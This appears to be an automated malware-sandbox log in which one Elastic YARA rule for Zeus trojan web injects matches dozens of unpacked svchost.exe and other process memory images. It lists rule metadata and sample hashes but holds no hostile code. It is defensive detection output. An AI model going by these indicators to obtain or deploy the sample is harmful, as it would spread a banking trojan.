Source: 2.3.svchost.exe.b00000.84.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e440000.47.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.62.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.71.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.68.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.63.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4900000.48.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.407000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.83.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.58.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.24a6c00.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e2c0000.39.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.43c0000.51.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.60.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.81.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.78.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2640000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.72.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.57.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.74.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2640000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.uavINoSIQh.exe.59d700.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
